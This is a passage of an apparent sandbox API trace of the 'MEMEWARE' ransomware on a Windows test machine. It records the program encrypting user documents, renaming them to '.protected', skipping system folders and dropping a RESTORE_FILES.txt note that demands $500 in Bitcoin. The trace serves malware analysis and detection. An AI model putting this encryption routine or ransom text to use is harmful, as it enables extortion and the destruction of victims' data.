lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0091.487] CloseHandle (hObject=0xd4) returned 1 [0091.487] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.487] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.487] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\RESTORE_FILES.txt") returned 71 [0091.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.488] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.488] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.489] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.489] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.489] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.489] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.489] CloseHandle (hObject=0xb4) returned 1 [0091.491] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="Windows") returned -1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="Program Files") returned -1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="Program Files (x86)") returned -1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="$Recycle.bin") returned 1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="System Volume Information") returned -1 [0091.491] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned 53 [0091.491] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0091.491] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0091.491] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*") returned 55 [0091.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0091.491] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="Windows") returned -1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="Program Files") returned -1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="Program Files (x86)") returned -1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="$Recycle.bin") returned 1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="System Volume Information") returned -1 [0091.492] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots") returned 60 [0091.492] StrStrIW (lpFirst="nMxPI49aM3RP.ots", lpSrch=".protected") returned 0x0 [0091.492] lstrcmpW (lpString1="nMxPI49aM3RP.ots", lpString2="RESTORE_FILES.txt") returned -1 [0091.492] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.492] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nmxpi49am3rp.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots") returned 60 [0091.493] StrStrW (lpFirst="nMxPI49aM3RP.ots", lpSrch=".txt") returned 0x0 [0091.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots") returned 60 [0091.493] StrStrW (lpFirst="nMxPI49aM3RP.ots", lpSrch=".rar") returned 0x0 [0091.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots") returned 60 [0091.493] StrStrW (lpFirst="nMxPI49aM3RP.ots", lpSrch=".zip") returned 0x0 [0091.493] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.494] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.494] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.494] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.494] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.494] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.494] CloseHandle (hObject=0xb4) returned 1 [0091.494] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots.protected") returned 70 [0091.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nmxpi49am3rp.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nmxpi49am3rp.ots.protected")) returned 1 [0091.495] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="Windows") returned -1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="Program Files") returned -1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="Program Files (x86)") returned -1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="$Recycle.bin") returned 1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="System Volume Information") returned -1 [0091.495] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx") returned 57 [0091.495] StrStrIW (lpFirst="NzyaSFus.docx", lpSrch=".protected") returned 0x0 [0091.495] lstrcmpW (lpString1="NzyaSFus.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.495] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.495] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nzyasfus.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx") returned 57 [0091.496] StrStrW (lpFirst="NzyaSFus.docx", lpSrch=".txt") returned 0x0 [0091.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx") returned 57 [0091.496] StrStrW (lpFirst="NzyaSFus.docx", lpSrch=".rar") returned 0x0 [0091.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx") returned 57 [0091.496] StrStrW (lpFirst="NzyaSFus.docx", lpSrch=".zip") returned 0x0 [0091.496] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.497] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.497] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.497] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.497] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.497] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.497] CloseHandle (hObject=0xb4) returned 1 [0091.497] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx.protected") returned 67 [0091.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nzyasfus.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nzyasfus.docx.protected")) returned 1 [0091.498] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="Windows") returned -1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="Program Files") returned -1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="Program Files (x86)") returned -1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="$Recycle.bin") returned 1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="System Volume Information") returned -1 [0091.498] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned 57 [0091.498] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0091.498] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0091.498] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*") returned 59 [0091.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.498] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.498] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.498] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.498] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.498] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.499] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\.") returned 59 [0091.499] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.499] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.499] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.499] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.499] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.499] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.499] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.499] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\..") returned 60 [0091.499] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.499] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.499] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="Windows") returned -1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="Program Files") returned 1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="Program Files (x86)") returned 1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="$Recycle.bin") returned 1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="System Volume Information") returned 1 [0091.499] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0091.499] StrStrIW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch=".protected") returned 0x0 [0091.499] lstrcmpW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="RESTORE_FILES.txt") returned 1 [0091.499] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.499] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.499] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0091.499] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch=".txt") returned 0x0 [0091.500] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0091.500] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch=".rar") returned 0x0 [0091.500] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0091.500] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch=".zip") returned 0x0 [0091.500] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.502] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.502] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.502] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.502] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.519] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.519] CloseHandle (hObject=0xd4) returned 1 [0091.520] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.protected") returned 90 [0091.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.protected")) returned 1 [0091.521] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.521] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.521] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\RESTORE_FILES.txt") returned 75 [0091.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.521] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.522] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.524] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.524] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.525] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.525] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.525] CloseHandle (hObject=0xb4) returned 1 [0091.525] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.525] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="Windows") returned -1 [0091.525] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="Program Files") returned -1 [0091.525] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="Program Files (x86)") returned -1 [0091.526] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="$Recycle.bin") returned 1 [0091.526] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="System Volume Information") returned -1 [0091.526] 